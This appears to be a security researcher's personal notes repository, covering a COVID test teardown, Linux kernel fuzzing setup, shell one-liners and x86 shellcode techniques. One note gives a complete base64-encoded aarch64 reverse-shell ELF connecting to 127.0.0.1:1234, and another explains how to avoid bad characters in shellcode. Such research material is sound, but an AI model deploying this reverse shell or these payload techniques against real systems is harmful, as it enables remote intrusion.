├── LICENSE ├── README.md ├── hardware └── ellume_covid_test_teardown.md ├── linux ├── ansi.md ├── elf │ ├── aarch64_reverse_shell.md │ └── relro.md ├── lkbuild.sh ├── multiarch_crosscompiling.md ├── oneliners.md ├── syzkaller_setup.md └── vim_hex_editor.md ├── programming └── shellcodetricks.md ├── protocols ├── list_protos.sh ├── pcap_format.md └── wiresharktips.md ├── re ├── ghidra_setup.md ├── string_representation.md └── timestamps.md ├── sysadmin ├── matrix_synapse.md └── matrix_tokenstore.py └── themes ├── darkmode.md └── prompts.md /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2023 netspooky 2 | 3 | Permission to use, copy, modify, and/or distribute this software for any 4 | purpose with or without fee is hereby granted. 5 | 6 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH 7 | REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY 8 | AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, 9 | INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM 10 | LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR 11 | OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR 12 | PERFORMANCE OF THIS SOFTWARE. 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # notes 2 | 3 | I'm using this repo to keep track of little notes, tips and tricks, and other stuff that I've shown people or found. Take everything here with a grain of salt. 4 | -------------------------------------------------------------------------------- /hardware/ellume_covid_test_teardown.md: -------------------------------------------------------------------------------- 1 | # Ellume Covid Test Teardown 2 | 3 | _Originally Posted: [2021-07-21](https://twitter.com/netspooky/status/1417721950881959938)_ 4 | 5 | I bought one of these today because I needed to take a test. It was the only one at CVS and it was disappointing because it required me to link with a phone to get my results. Let's see what's inside: 6 | 7 | ![image](https://user-images.githubusercontent.com/26436276/209997590-19cfbbca-b4a6-43cf-9806-41caf2818127.png) 8 | 9 | The test itself is pretty standard. You do the nose thing, dip in some fluid, then squirt into The Hole. Pair with your phone and some weird app with weird reviews, and boom, helth 10 | 11 | ![image](https://user-images.githubusercontent.com/26436276/209997632-c4ff6d59-f0f6-46b0-abe1-2f06c99b65d5.png) 12 | 13 | You can very easily pry it apart with a screw driver, revealing a small board with a plastic housing attached, and a lil coin battery 14 | 15 | ![image](https://user-images.githubusercontent.com/26436276/209997679-af82caa0-401a-4059-8f56-2f39f43f6380.png) 16 | 17 | Pop off the housing to reveal that it's just a test strip being read by some circuit that shines light and reads the strip. It's pretty straight forward, but also annoying that this whole contraption was $40USD and required me to download an app and give them all my info. 18 | 19 | ![image](https://user-images.githubusercontent.com/26436276/209997714-67ec3f5e-d1fb-4def-a378-d26d906ff08a.png) 20 | 21 | ![image](https://user-images.githubusercontent.com/26436276/209997719-dfd2a4c6-4a72-4b4e-b95f-010fd2870dca.png) 22 | 23 | On the plus side, you do get a nice Nordic Semiconductor nRF52810 and test pads to reprogram it if you want to play around with BLE. It's got an ARM Cortex M4 and a 2.4 GHz transciever. It's a shame it's meant to be thrown away, you can have a lot of fun with this. 24 | 25 | ![image](https://user-images.githubusercontent.com/26436276/209998039-b2232172-9008-402f-b7ba-3d211eb9e2ca.png) 26 | 27 | tl;dr - You can rip the test strip out instead of giving your data to some dodgy company, and you get a BLE SoC to mess around with. 28 | 29 | Also I tested negative 🎉 30 | 31 | For those wondering, here is the backside of the board. So many test pads! Also I labeled the main test pads near the battery after tracing from the datasheet if you want to reprogram using SWD. Have fun! 32 | 33 | ![image](https://user-images.githubusercontent.com/26436276/209997784-1f101ad6-64f7-4d61-997c-518c1f1e4b84.png) 34 | 35 | ![image](https://user-images.githubusercontent.com/26436276/209997793-c9787707-93d1-4b74-8343-210326553f82.png) 36 | 37 | ![image](https://user-images.githubusercontent.com/26436276/209997807-43323e00-c79b-468f-87b4-ed66146f2f82.png) 38 | 39 | Additionally, [black0wl](https://twitter.com/b1ack0wl/status/1417991582444310528) found that there's some funky stuff going on on the company's website that probably came from a vulnerable wordpress plugin. 40 | 41 | ![image](https://user-images.githubusercontent.com/26436276/209997902-d2dae350-aabf-4e16-bd8a-95780ae315bc.png) 42 | 43 | Also someone else did a more in depth teardown here: https://routevegetable.com/covid-test-2/ 44 | -------------------------------------------------------------------------------- /linux/ansi.md: -------------------------------------------------------------------------------- 1 | Oneliner to clear the screen `echo -ne "\x1b\x5b\x48\x1b\x5b\x32\x4a\x1b\x5b\x33\x4a"` 2 | 3 | As base64 `base64 -d <<< G1tIG1syShtbM0o=` 4 | 5 | This also does this, but it's shorter and it's supposed to work on older systems. `echo -ne "\x1bc"` 6 | 7 | hahaha `base64 -d <<< G2N1` clears the screen and puts a u at the top left 8 | 9 | This clears and puts U's til the end of the console line `base64 -d <<< G2NVG1s5OTli` 10 | -------------------------------------------------------------------------------- /linux/elf/aarch64_reverse_shell.md: -------------------------------------------------------------------------------- 1 | # 208 byte aarch64 ELF reverse shell 2 | 3 | Originally posted 2022-11-16 4 | 5 | Reverse shell, connects back to 127.0.0.1:1234 6 | 7 | Base64 (280 characters) 8 | ``` 9 | f0VMRsgYgNICAIDSAgAAFAIAtwAhAIDSBAAAFAAAAABAAAAAAAAAAEAAgNIBAADUCgAAFE 10 | AAOAABAAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAAAUAAAAAOMDACoFAAAUABAAAAAAAAAA 11 | EAAAAAAAAGgZgNICAoDSQQCA0oFAuvLhD8DyASDg8uEPH/jhAwCRAQAA1AgDgNJhAIDS4g 12 | MfquADAyohBADxAQAA1IH//1SoG4DS4EWM0iDNrfLgZc7yAA3g8uADAPngAwCRAQAA1A== 13 | ``` 14 | 15 | Running on a raspberry pi 4 with the latest kernel 16 | 17 | ![two terminals, one loading the base64 into a file called nice.bin and executing it, and another terminal catching the reverse shell and running ls to show the size of the binary](https://user-images.githubusercontent.com/26436276/209994747-bd16dde4-342f-4f34-afff-24bcd37b7409.png) 18 | 19 | I was playing with automatically encoding certain aarch64 instructions so I can script out certain payloads and this was my PoC. It's a bit trickier to encode bc of how aarch64 is packed but it's not that crazy. 20 | 21 | ![a python function that encodes IP and Port values and places them in instruction templates and returns the buffer of bytes](https://user-images.githubusercontent.com/26436276/209994818-3adac183-72b2-495e-b23c-8ab71ff35142.png) 22 | 23 | I made this little diagram to explain aarch64 instruction encoding. Each instruction is movk x1, somevalue, some shift here. But you can see things like where in x1 the value is places (denoted by the shift or hw field) and then the immediate value which is highlighted in orange. 24 | 25 | ![listing of aarch64 instructions with annotated bits](https://user-images.githubusercontent.com/26436276/209994890-b086b2cf-a306-46bf-ba8c-80f6568b4c3e.png) 26 | 27 | The encoding is different for each class of instructions, but you'll have to read the instruction set docs for full explanation of each. Just wanted to show what goes into encoding an instruction for those curious. 28 | -------------------------------------------------------------------------------- /linux/elf/relro.md: -------------------------------------------------------------------------------- 1 | # ELF RELRO 2 | From 2022-09-21 3 | 4 | ### Question 5 | How do you verify if a binary is compiled with RELRO? What do all the flags mean? 6 | 7 | ### Answer 8 | 9 | The docs and online discussions about this are super confusing. The whole point of doing RELRO is to set RTLD_NOW when the linker calls [dlopen](https://man7.org/linux/man-pages/man3/dlopen.3.html) in some way. This tells the linker to resolve everything before execution (this actually happens before dlopen returns) and map the area the GOT is in as read-only. 10 | 11 | This can be done in a few ways: 12 | - DT_BIND_NOW - A .dynamic section tag that explicitly sets this flag. 13 | - DF_BIND_NOW - A flag within the DT_FLAGS tag in the .dynamic section. 14 | - DF_1_NOW - A flag within DT_FLAGS_1, another .dynamic tag. 15 | - LD_BIND_NOW - This environment variable being a non-empty string will also trigger this. 16 | 17 | Since these are linker instructions, there's nothing stopping a linker from either not supporting something, or ignoring the tag all together. 18 | 19 | The best way to verify is to run the binary on the target system and check the memory permissions for the area that the GOT is in. If it's marked read only, then it was a success. 20 | 21 | Trusting tools like readelf or checksec can lead to a false sense of security, as they can be easily manipulated via malicious crafted ELFs, or with linker/compiler/runtime bugs that can lead to weird outcomes. 22 | -------------------------------------------------------------------------------- /linux/lkbuild.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | LKBUILDVERS="20221129.1" 4 | ### LKBUILD.SH ------------------------------------------------------------------------------------- 5 | # 6 | # This script will do the following: 7 | # - Build the Linux kernel with specified Kconfig options (in kConf variable) 8 | # - Build the a Debian image of this kernel 9 | # - Boot the kernel using qemu 10 | # 11 | # -------------------------------------------------------------------------------------------------- 12 | # .: Host Setup :. 13 | # 14 | # - Assuming you are using Ubuntu or other Debian flavored distro, this will install what you need 15 | # for the build system, creating debian images, and installing qemu 16 | # $ sudo apt update 17 | # $ sudo apt install make gcc flex bison libncurses-dev libelf-dev libssl-dev 18 | # $ sudo apt install debootstrap 19 | # $ sudo apt install qemu-system-x86 20 | # - More info on how to setup using syzkaller options: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md 21 | # 22 | # -------------------------------------------------------------------------------------------------- 23 | # .: Script Setup :. 24 | # 25 | # - Create a directory called ~/kernel/ and cd into it 26 | # - Grab create-image.sh from syzkaller, this is used to create a debian image 27 | # $ wget https://github.com/google/syzkaller/blob/master/tools/create-image.sh 28 | # - PROTIP: Change the hostname variable in this script to whatever you want. Default is "syzkaller" 29 | # - Clone your kernel image and cd into it 30 | # $ git clone --branch v5.15 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git 31 | # - Alternatively you can download the tarball of your desired kernel version from the cdn. 32 | # https://cdn.kernel.org/pub/linux/kernel/ 33 | # - Copy this script to the root of your linux kernel source 34 | # - Update the config options below 35 | # - Run this script 36 | # 37 | # -------------------------------------------------------------------------------------------------- 38 | # .: Interacting with your kernel :. 39 | # 40 | # - The kernel will be booted using qemu. Log in with the username root and default creds. 41 | # - The create-image script will generate keys for you 42 | # - Put this into your ~/.ssh/config file, change the IdentityFile to wherever your kernel's debimg folder is. 43 | # Host qemu 44 | # HostName localhost 45 | # User root 46 | # Port 10021 47 | # IdentityFile ~/kernel/linux_5.15/debimg/stretch.id_rsa 48 | # StrictHostKeyChecking no 49 | # - Now you can ssh into your kernel by doing: 50 | # $ ssh qemu 51 | # - You can scp files by doing 52 | # $ scp myfile.bin qemu: 53 | # 54 | # -------------------------------------------------------------------------------------------------- 55 | # .: Other Tips :. 56 | # 57 | # REBUILD 58 | # 59 | # - If you want to rebuild your kernel, run this in the root of your Linux directory: 60 | # $ make clean 61 | # 62 | # DEBUG 63 | # 64 | # - This script was written to generate kernels you can debug with gdb. 65 | # - The gdb script you need is in $KERNEL/scripts/gdb/ 66 | # - Add this to your ~/.gdbinit file, changing the path to your kernel. 67 | # add-auto-load-safe-path /home/user/kernel/linux_5.15/scripts/gdb/vmlinux-gdb.py 68 | # - To debug the kernel, do this: 69 | # $ cd /path/to/your/kernel/ 70 | # $ gdb ./vmlinux 71 | # (gdb) lx-symbols 72 | # (gdb) target remote :1234 73 | # - Now you are debugging the kernel! 74 | # - More info here: https://docs.kernel.org/dev-tools/gdb-kernel-debugging.html 75 | # 76 | # -------------------------------------------------------------------------------------------------- 77 | 78 | ### Config Options ################################################################################# 79 | KERNEL="/home/user/kernel/linux_5.15" # This is where the kernel was cloned 80 | IMAGE="$KERNEL/debimg" # This is where the debian image will live. 81 | 82 | # Put all the kconfig options in here 83 | # For more info on these check out this site: https://cateee.net/lkddb/web-lkddb/DEBUG_KMEMLEAK.html 84 | kConf=$(cat <<-END 85 | CONFIG_CONFIGFS_FS=y 86 | CONFIG_DEBUG_FS=y 87 | CONFIG_DEBUG_INFO=y 88 | CONFIG_DEBUG_KMEMLEAK=y 89 | CONFIG_KASAN=y 90 | CONFIG_KASAN_INLINE=y 91 | CONFIG_KCOV=y 92 | CONFIG_KCOV_ENABLE_COMPARISONS=y 93 | CONFIG_KCOV_INSTRUMENT_ALL=y 94 | CONFIG_SECURITYFS=y 95 | CONFIG_SLAB_DEBUG=y 96 | CONFIG_USER_NS=y 97 | CONFIG_FRAME_POINTER=y 98 | CONFIG_DEBUG_KERNEL=y 99 | CONFIG_GDB_SCRIPTS=y 100 | \n 101 | END 102 | ) 103 | 104 | ### End Config Options ############################################################################# 105 | 106 | echo "---------------------------------" >> ~/kernel/build.log 107 | echo "[$(date)] Configuring $KERNEL" >> ~/kernel/build.log 108 | 109 | echo -e "[$(date)] \x1b[38;5;51mConfiguring Kernel\x1b[0m" 110 | make defconfig 111 | make kvm_guest.config 112 | 113 | # Add to .config 114 | printf "$kConf" >> .config 115 | 116 | make olddefconfig 117 | 118 | echo "[$(date)] Start compilation" >> ~/kernel/build.log 119 | echo -e "[$(date)] \x1b[38;5;51mCompiling the kernel\x1b[0m" 120 | 121 | make -j`nproc` 122 | 123 | echo "[$(date)] End compilation, starting image build" >> ~/kernel/build.log 124 | 125 | mkdir debimg 126 | cp ~/kernel/create-image.sh debimg/ 127 | cd debimg 128 | echo -e "[$(date)] \x1b[38;5;51mBuilding the image\x1b[0m" 129 | ./create-image.sh 130 | 131 | echo "[$(date)] End image build, booting image" >> ~/kernel/build.log 132 | echo -e "[$(date)] \x1b[38;5;51mRunning the image\x1b[0m" 133 | 134 | # This part creates a runk.sh script and runs the image in qemu for us. The script is reusable 135 | 136 | cat << EOF >> runk.sh 137 | #!/bin/bash 138 | 139 | KERNEL="$KERNEL" 140 | IMAGE="$IMAGE" 141 | 142 | qemu-system-x86_64 \\ 143 | -m 2G \\ 144 | -smp 2 \\ 145 | -kernel \$KERNEL/arch/x86/boot/bzImage \\ 146 | -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 nokaslr" \\ 147 | -drive file=\$IMAGE/stretch.img,format=raw \\ 148 | -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \\ 149 | -net nic,model=e1000 \\ 150 | -nographic \\ 151 | -enable-kvm \\ 152 | -cpu host \\ 153 | -s \\ 154 | -pidfile vm.pid \\ 155 | 2>&1 | tee vm.log 156 | EOF 157 | 158 | chmod +x runk.sh 159 | ./runk.sh 160 | -------------------------------------------------------------------------------- /linux/multiarch_crosscompiling.md: -------------------------------------------------------------------------------- 1 | Notes relevant to multiarch and cross compiling 2 | 3 | # Setting up 32bit ARM on aarch64 4 | 5 | Lets say you see something like this 6 | ``` 7 | pi@rpi4:~/ $ ./myBin 8 | ./myBin: error while loading shared libraries: myLib.so: wrong ELF class: ELFCLASS64 9 | ``` 10 | If you want to install armhf on an aarch64 system (eg raspbian on raspberry pi 4), do this: 11 | ``` 12 | sudo dpkg --add-architecture armhf 13 | sudo apt install libc6:armhf 14 | ``` 15 | This adds the option to use this arch via dpkg. Then installing the armhf version of libc6 will allow you to use libraries as the linker for libc is now available (as well as the standard library) 16 | -------------------------------------------------------------------------------- /linux/oneliners.md: -------------------------------------------------------------------------------- 1 | There's so many one liners I forget, so I will put them here. 2 | 3 | ### Misc Useful 4 | Find duplicate files 5 | ``` 6 | find . ! -empty -type f -exec md5sum {} + | sort | uniq -w32 -dD 7 | ``` 8 | Extract all zip files in current directory 9 | ``` 10 | find . -name "*.zip" -exec mkdir {}_ \; -exec mv {} {}_/ \; -exec 7z x {}_/{} -o{}_/ \; 11 | ``` 12 | generate uuid 13 | ``` 14 | cat /proc/sys/kernel/random/uuid 15 | ``` 16 | How to use USBPCAP on Ubuntu 17 | ``` 18 | sudo modprobe usbmon 19 | sudo setfacl -m u:$USER:r /dev/usbmon* 20 | ``` 21 | Disable system beep 22 | ``` 23 | rmmod pcspkr ; echo "blacklist pcspkr" >>/etc/modprobe.d/blacklist.conf 24 | ``` 25 | 26 | ### Vim, Regex, Grep 27 | 28 | remove trailing whitespace regex 29 | ``` 30 | [^\S\r\n]+$ 31 | ``` 32 | How to remove all lines containing value REMOVEME 33 | ``` 34 | ^.*REMOVEME.*\n 35 | ``` 36 | Vim: Remove all blank lines in a file 37 | ``` 38 | :g/^$/d 39 | ``` 40 | Find all memcpy instances in a dir (with line numbers) 41 | ``` 42 | grep --color -rin memcpy . 43 | ``` 44 | 45 | ### Hex Stuff 46 | Here's a tutorial I made about using Vim as a hex editor: https://twitter.com/netspooky/status/1553047692678414337 47 | 48 | copy intel hex format to bin 49 | ``` 50 | objcopy -I ihex file.hex -O binary file.bin 51 | ``` 52 | reverse hex dump 53 | ``` 54 | cat asciihex.txt | xxd -r -p > file.bin 55 | ``` 56 | base64 to bin 57 | ``` 58 | base64 -d <<< someb64here > file.bin 59 | ``` 60 | perl hexdump 61 | ``` 62 | perl -e 'local $/; print unpack "H*", <>' file.bin 63 | ``` 64 | convert hex value to decimal 65 | ``` 66 | printf "%d\n" $((16#6132387a)) 67 | ``` 68 | 69 | ### Tshark and Wireshark 70 | 71 | Convert a packet to binary from the command line 72 | ``` 73 | tshark -x -r file.pcap -Y “frame.number==[packet#]” | xxd -r > file.bin 74 | ``` 75 | tshark find byte patterns 76 | ``` 77 | tshark -r some.pcap -Y 'data.data contains "\x12\x34"' -T fields -e data 78 | ``` 79 | wireshark get first 500 frames 80 | ``` 81 | frame.number < 501 82 | ``` 83 | wireshark get frames 450-500 84 | ``` 85 | frame.number < 501 and frame.number > 450 86 | ``` 87 | tshark just grab some fields (in this case grabbing `bgblink.sync1_dv` with a filter (here it's `"bgblink.command == 104 and ip.src == 127.0.0.1"`) 88 | ``` 89 | tshark -r gameboy.pcapng -Y "bgblink.command == 104 and ip.src == 127.0.0.1" -T fields -e bgblink.sync1_dv 90 | ``` 91 | tshark list all protocols in a given pcap 92 | ``` 93 | tshark -r capture.pcap -T fields -e frame.protocols | sort -u 94 | ``` 95 | -------------------------------------------------------------------------------- /linux/syzkaller_setup.md: -------------------------------------------------------------------------------- 1 | These are my notes on setting up and running syzkaller. For a full guide check out the docs. https://github.com/google/syzkaller/blob/master/docs/linux/setup.md 2 | 3 | Use all these at your own risk! 4 | 5 | # Kernel config 6 | 7 | General good kconfig options for syzkaller. 8 | 9 | ``` 10 | # Coverage collection. 11 | CONFIG_KCOV=y 12 | 13 | # Debug info for symbolization. 14 | CONFIG_DEBUG_INFO=y 15 | 16 | # Memory bug detector 17 | CONFIG_KASAN=y 18 | CONFIG_KASAN_INLINE=y 19 | 20 | # Required for Debian Stretch 21 | CONFIG_CONFIGFS_FS=y 22 | CONFIG_SECURITYFS=y 23 | ``` 24 | Additional syzkaller related ones are here: https://github.com/google/syzkaller/blob/master/docs/linux/kernel_configs.md 25 | 26 | Other useful ones 27 | ``` 28 | CONFIG_USER_NS=y 29 | CONFIG_SLAB_DEBUG=y 30 | ``` 31 | 32 | PROTIP: To learn about any standard CONFIG option, use this website. Remove the `CONFIG_` part of the variable to search. 33 | - eg. `CONFIG_KASAN` info: https://cateee.net/lkddb/web-lkddb/KASAN.html 34 | 35 | # Quick Compile 36 | 37 | Clone the branch you want. Check the releases section for tag names. 38 | ``` 39 | git clone --branch v5.17-rc5 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git 40 | cd linux 41 | ``` 42 | Now generate the configs 43 | ``` 44 | make defconfig 45 | make kvm_guest.config 46 | ``` 47 | Add to the .config file 48 | ``` 49 | CONFIG_CONFIGFS_FS=y 50 | CONFIG_DEBUG_FS=y 51 | CONFIG_DEBUG_INFO=y 52 | CONFIG_DEBUG_KMEMLEAK=y 53 | CONFIG_KASAN=y 54 | CONFIG_KASAN_INLINE=y 55 | CONFIG_KCOV=y 56 | CONFIG_KCOV_ENABLE_COMPARISONS=y 57 | CONFIG_KCOV_INSTRUMENT_ALL=y 58 | CONFIG_SECURITYFS=y 59 | CONFIG_SLAB_DEBUG=y 60 | CONFIG_USER_NS=y 61 | ``` 62 | Now load up all these into your config 63 | ``` 64 | make olddefconfig 65 | ``` 66 | Finally, make the kernel image 67 | ``` 68 | make -j`nproc` 69 | ``` 70 | Now you have to create a debian image. You can use https://github.com/google/syzkaller/blob/master/tools/create-image.sh to make one with a stock config. 71 | ``` 72 | mkdir debimg 73 | cp ~/kernel/create-image.sh debimg/ 74 | cd debimg 75 | ./create-image.sh 76 | ``` 77 | 78 | # Running your image 79 | Definitely follow the guide for more info, but generally you want to set up a few things in your config. Namely the workdir, the kernel objects, and the keys. 80 | 81 | ``` 82 | { 83 | "name": "Hello", 84 | "target": "linux/amd64", 85 | "http": "0.0.0.0:56741", 86 | "workdir": "/home/user/syzkaller/workdir", 87 | "kernel_obj": "/home/user/kernel/linux/", 88 | "image": "/home/user/kernel/5.17-rc5/linux/debimage/stretch.img", 89 | "sshkey": "/home/user/kernel/5.17-rc5/linux/debimage/stretch.id_rsa", 90 | "syzkaller": "/home/user/syzkaller", 91 | "procs": 8, 92 | "type": "qemu", 93 | "reproduce": true, 94 | "suppressions": [ 95 | "no output from test machine" 96 | ], 97 | "vm": { 98 | "count": 4, 99 | "kernel": "/home/user/kernel/5.17-rc5/linux/arch/x86/boot/bzImage", 100 | "cpu": 2, 101 | "mem": 2048 102 | } 103 | } 104 | ``` 105 | Finally you can run with qemu 106 | ``` 107 | qemu-system-x86_64 \ 108 | -m 2G \ 109 | -smp 2 \ 110 | -kernel /home/user/kernel/5.17-rc5/linux/arch/x86/boot/bzImage \ 111 | -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \ 112 | -drive file=/home/user/kernel/5.17-rc5/linux/debimage/stretch.img,format=raw \ 113 | -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \ 114 | -net nic,model=e1000 \ 115 | -enable-kvm \ 116 | -nographic \ 117 | -pidfile vm.pid \ 118 | 2>&1 | tee vm.log 119 | ``` 120 | Now you can connect to the running kernel with 121 | ``` 122 | ssh -i ~/kernel/5.17-rc5/linux/debimg/stretch.id_rsa -p 10021 root@127.0.0.1 123 | ``` 124 | Transfer files: 125 | ``` 126 | scp -i ~/kernel/5.17-rc5/linux/debimg/stretch.id_rsa -P 10021 stupid_bug.c root@127.0.0.1: 127 | ``` 128 | If you're doing a lot of testing, you might need to clear your ssh keys from known_hosts if you can't connect. 129 | ``` 130 | ssh-keygen -f "/home/user/.ssh/known_hosts" -R "[127.0.0.1]:10021" 131 | ``` 132 | 133 | -------------------------------------------------------------------------------- /linux/vim_hex_editor.md: -------------------------------------------------------------------------------- 1 | # Vim Hex Editor Tutorial 2 | 3 | _Originally Posted 2022-07-29_ 4 | 5 | Open file, type `:%!xxd` to enter hex mode 6 | 7 | ![Vim with "This is some text", typing the command :%!xxd](https://user-images.githubusercontent.com/26436276/209995509-af56ec0e-5924-42c7-9bac-96da91ee0d27.png) 8 | 9 | Optional - Turn on hex syntax highlighting with `:set ft=xxd` 10 | 11 | ![vim in hex editor mode, syntax highlighting done with :set ft=xxd](https://user-images.githubusercontent.com/26436276/209995529-2300f14a-d348-4678-8173-dc0fab77fce1.png) 12 | 13 | Make changes to the hex bytes 14 | 15 | ![Making changes to the hex dump in vim](https://user-images.githubusercontent.com/26436276/209995559-ba2505a1-cd76-439b-86bb-88f1332a035b.png) 16 | 17 | Leave hex mode with `:%!xxd -r` 18 | 19 | ![Switching out of hex mode with :%!xxd -r](https://user-images.githubusercontent.com/26436276/209995593-eb863ae7-f01b-4898-a18c-da306bca9a35.png) 20 | 21 | Exit vim with `:call libcallnr("libc.so.6","exit",0)` 22 | -------------------------------------------------------------------------------- /programming/shellcodetricks.md: -------------------------------------------------------------------------------- 1 | # Shellcode Tricks 2 | 3 | From 2021-07-02 4 | 5 | * Solid reference https://www.felixcloutier.com/x86/index.html 6 | * Hex Calculator https://n0.lol/hc/ 7 | * WinREPL for x86 Assembly https://github.com/zerosum0x0/WinREPL/releases/ 8 | * Online Assembler https://defuse.ca/online-x86-assembler.htm 9 | 10 | ## Avoiding bad chars 11 | 12 | ### Shifting left to avoid bad chars 13 | 14 | Let's say you want to put 0x400 in EAX 15 | 16 | Doing it like this yields null bytes 17 | 18 | b8 00 04 00 00 mov eax, 0x400 19 | 66 b8 00 04 mov ax, 0x400 20 | 21 | So you could do it like: 22 | 23 | xor eax, eax 24 | inc eax 25 | shl eax, 0x0A 26 | 27 | But this yields a potential bad char: 0xA 28 | 29 | Shift past the bounds of EAX and end up on the same spot by adding 32 (0x20) to your shift parameter. This works because we know that EAX is 32 bits, so adding 32 will land you in the same location. 30 | 31 | If you have a 0x1 in EAX 32 | 33 | xor eax, eax 34 | inc eax 35 | 36 | Any of these will give you the 0x400 you are looking for 37 | 38 | shl eax, 0x2a 39 | shl eax, 0x4a 40 | shl eax, 0x6a 41 | etc.. 42 | 43 | - SHR shifts things out of the register, so it won't work for this 44 | - There's other ways to do this with ROR/ROL 45 | - Shift Reference: https://www.felixcloutier.com/x86/sal:sar:shl:shr 46 | - Similar effects can be done with multiplication instructions if needed 47 | 48 | ### Chaining SHL 49 | 50 | You can also chain shifts and increment operations together too, this can be used to build a complex values. 51 | 52 | Let's say we want 0x0A0D in EAX, to use shifts, we need to look at these values in binary 53 | 54 | 0x0A 0x0D 55 | 00001010 00001101 56 | 57 | We can then take the distance between the 1's and calculate how many shifts we need to do 58 | 59 | 0x0A────0x0D──── 60 | 0000101000001101 61 | 2 ─────┴─┘ ││ │ 62 | 6 ───────┴─────┘│ │ 63 | 1 ─────────────┴┘ │ 64 | 2 ──────────────┴─┘ 65 | 66 | Apply this by repeatedly incrementing and shifting left: 67 | 68 | ;-------------; OPCODE ; EAX Value --------------------------; Description ------ 69 | xor eax, eax ; 31c0 ; 00000000 00000000 00000000 00000000 ; Clear EAX 70 | inc eax ; 40 ; 00000000 00000000 00000000 00000001 ; Increment 71 | shl eax, 0x2 ; c1e002 ; 00000000 00000000 00000000 00000100 ; Shifting by 2 bits 72 | inc eax ; 40 ; 00000000 00000000 00000000 00000101 ; Increment 73 | shl eax, 0x6 ; c1e006 ; 00000000 00000000 00000001 01000000 ; Shifting by 6 bits 74 | inc eax ; 40 ; 00000000 00000000 00000001 01000001 ; Increment 75 | shl eax, 0x1 ; d1e0 ; 00000000 00000000 00000010 10000010 ; Shifting by 1 bit 76 | inc eax ; 40 ; 00000000 00000000 00000010 10000011 ; Increment 77 | shl eax, 0x2 ; c1e002 ; 00000000 00000000 00001010 00001100 ; Shifting by 2 bits 78 | inc eax ; 40 ; 00000000 00000000 00001010 00001101 ; Increment 79 | 80 | We can use the previous trick of adding 32 (0x20) to our shift value to avoid bad chars 81 | 82 | ;-------------; OPCODE ; EAX Value --------------------------; Description ------ 83 | xor eax, eax ; 31c0 ; 00000000 00000000 00000000 00000000 ; Clear EAX 84 | inc eax ; 40 ; 00000000 00000000 00000000 00000001 ; Increment 85 | shl eax, 0x42 ; c1e042 ; 00000000 00000000 00000000 00000100 ; Shifting by 2 bits 86 | inc eax ; 40 ; 00000000 00000000 00000000 00000101 ; Increment 87 | shl eax, 0x26 ; c1e026 ; 00000000 00000000 00000001 01000000 ; Shifting by 6 bits 88 | inc eax ; 40 ; 00000000 00000000 00000001 01000001 ; Increment 89 | shl eax, 0x41 ; c1e041 ; 00000000 00000000 00000010 10000010 ; Shifting by 1 bit 90 | inc eax ; 40 ; 00000000 00000000 00000010 10000011 ; Increment 91 | shl eax, 0x62 ; c1e062 ; 00000000 00000000 00001010 00001100 ; Shifting by 2 bits 92 | inc eax ; 40 ; 00000000 00000000 00001010 00001101 ; Increment 93 | 94 | ### Add and Sub 95 | 96 | Let's say you want 0x0A0D in EAX, but these are both bad chars, use the constant 0x1111 to armor it, then subtract the same value to restore. 97 | 98 | mov ax, 0x1B1E 99 | sub ax, 0x1111 100 | 101 | ### Logical Operations 102 | 103 | You can avoid bad chars by using bitmasks and logical instructions too 104 | 105 | In all of the examples, we want to put 0x0A0D in EAX 106 | 107 | XOR (A good online XOR calculator http://xor.pw/) 108 | 109 | mov ax, 0x3037 110 | xor ax, 0x3a3a 111 | 112 | NOT 113 | 114 | mov ax, 0xf5f2 115 | not ax 116 | 117 | OR 118 | 119 | 00001000 00001000 [0x0808] 120 | 00000010 00000101 [0x0205] 121 | -------------------------- ORing keeps 1 if either or both bits is set to 1 122 | 00001010 00001101 [0x0A0D] 123 | 124 | mov ax, 0x0808 125 | or ax, 0x0205 126 | 127 | AND 128 | 129 | 01011010 01001111 [0x5A4F] 130 | 00101011 00111101 [0x2B3D] 131 | -------------------------- ANDing only keeps 1 if both bits are set to 1 132 | 00001010 00001101 [0x0A0D] 133 | 134 | mov ax, 0x5A4F 135 | and ax, 0x2B3D 136 | 137 | ## Optimizing for Size 138 | 139 | ### Clearing Registers 140 | 141 | [cdq](https://www.felixcloutier.com/x86/cwd:cdq:cqo) - Sign extends EAX to EDX:EAX, so `xor eax, eax` and then `cdq` will make EDX and EAX both 0 in only 3 bytes. 142 | 143 | [mul](https://www.felixcloutier.com/x86/mul) - With only one operand specified, mul assumes that the destination is EAX, so it stores the result in EDX:EAX. 144 | 145 | xor ecx, ecx ; 0 146 | mul ecx ; Effectively edx_eax = ecx * eax, now all equal 0 147 | 148 | ### Filling Multiple registers 149 | 150 | * [pusha](https://www.felixcloutier.com/x86/pusha:pushad) 151 | * [popa](https://www.felixcloutier.com/x86/popa:popad) 152 | -------------------------------------------------------------------------------- /protocols/list_protos.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # List all the protocols detected in every pcap in a directory 3 | c1="\033[38;5;228m" 4 | c2="\033[38;5;122m" 5 | for file in $1/* 6 | do 7 | if [ "$file" != $0 ] ; then 8 | echo -e "$c1$file$c2" 9 | tshark -r "$file" -T fields -e frame.protocols | sort -u 10 | echo -e "\033[0m" 11 | fi 12 | done 13 | -------------------------------------------------------------------------------- /protocols/pcap_format.md: 